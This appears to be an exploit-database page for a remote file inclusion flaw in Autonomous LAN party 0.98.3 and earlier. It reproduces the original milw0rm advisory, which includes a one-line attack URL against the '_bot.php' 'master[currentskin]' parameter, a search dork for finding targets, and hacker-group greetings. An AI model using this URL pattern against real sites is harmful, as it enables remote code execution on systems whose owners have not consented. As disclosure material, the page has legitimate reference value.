Autonomous LAN party - exploit.company

vendor:

Autonomous LAN party

by:

cr4wl3r

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Autonomous LAN party

Affected Version From: 0.98.3

Affected Version To: 0.98.3

Patch Exists: YES

Related CWE: N/A

CPE: alp:alp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Autonomous LAN party <= 0.98.3 Remote File Include Vulnerability

A Remote File Include vulnerability exists in Autonomous LAN party version 0.98.3 and earlier. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system. The vulnerable parameter is 'master[currentskin]' in the '_bot.php' file.

Mitigation:

Upgrade to the latest version of Autonomous LAN party.

Source

Exploit-DB raw data:

============================================================================================================
[x] Autonomous LAN party <= 0.98.3 Remote File Include Vulnerability                                      ||
[!] Download Script      :                                                                                ||
http://sourceforge.net/projects/alp/files/alp/alp_0-98-3_15oct2006/alp_0-98-3_15oct2006.zip/download	  ||
[!] Author               :  cr4wl3r                                   		                          ||
[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org              		                          ||
[!] SiTe                 :  |www.sekuritionline.net| |www.manadocoding.net|              		  ||
[!] Location             :  Gorontalo - INDONESIA                     		                          ||
[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"     		                          ||
============================================================================================================
============================================================================================================
[x] 3xplo!t :                                                         		                          ||
                                                                      		                          ||
http://localhost/[path]/include/_bot.php?master[currentskin]=[AvriLhea]                                   ||
                                                                                                          ||
============================================================================================================
============================================================================================================
[!] Greetz : MyMom [alm]                                                                                  ||
                                                                		                          ||
[!] Special Thanks : str0ke, All MusLiM HacKers                                	                          ||
                                                                      		                          ||
[!] Shoutz : Mr_Athan, CyberPeaCe, AgenR@t, AngKy.Tat0ki, basix, EA.ngel, zvtral,                         ||
             bl4ck.3n91n3, d3vilnet, venom.injector,Funky.Sensey, untouch,                                ||
             exnome, Himoe, kec0a, Mr.C, Mr.crosbeam, Ri55ky, v3lix, Hmei7,                               ||
             CyberLog, g4pt3k, mywisdom, wendys, y0ps.512mb, Is.bl4nk, iY0ng,                             ||
             Anjas.chu'x, Jams.chu'X, Minj0.b0rj0e, exnome, dbanie, Ijan,                                 ||
             SunKetzu AbbaSSia, ty0                                                                       || 		
							              		                          ||
============================================================================================================							              		                          ||
[!] Thanks To MneR HacKer UniVerSiTas IcHsaN GoRonTaLo :                                                  ||
                                                                                                          ||
    Adi Saputera Abd Karim S.Kom, Sudirman Melangi S.Kom, Abd Manan ST, All StAF FaK FiKoM UniSaN         ||
    Dan SeLuRuh WisuDawan Universitas Ichsan Gorontalo Angkatan 2009                                      ||
    FroM : cr4wl3r a.k.a Ramdan Yantu S.Kom :lol:                                                         ||
                                                                                                          ||
============================================================================================================
[!]  To My HoNeY Lia Aprilia Hasan ---> BiarPun KaMu Lagi MaraH Tetap SaJa Kelihatan CanTik  ;)             ||
                                                                                                          ||
============================================================================================================

# milw0rm.com [2009-08-18]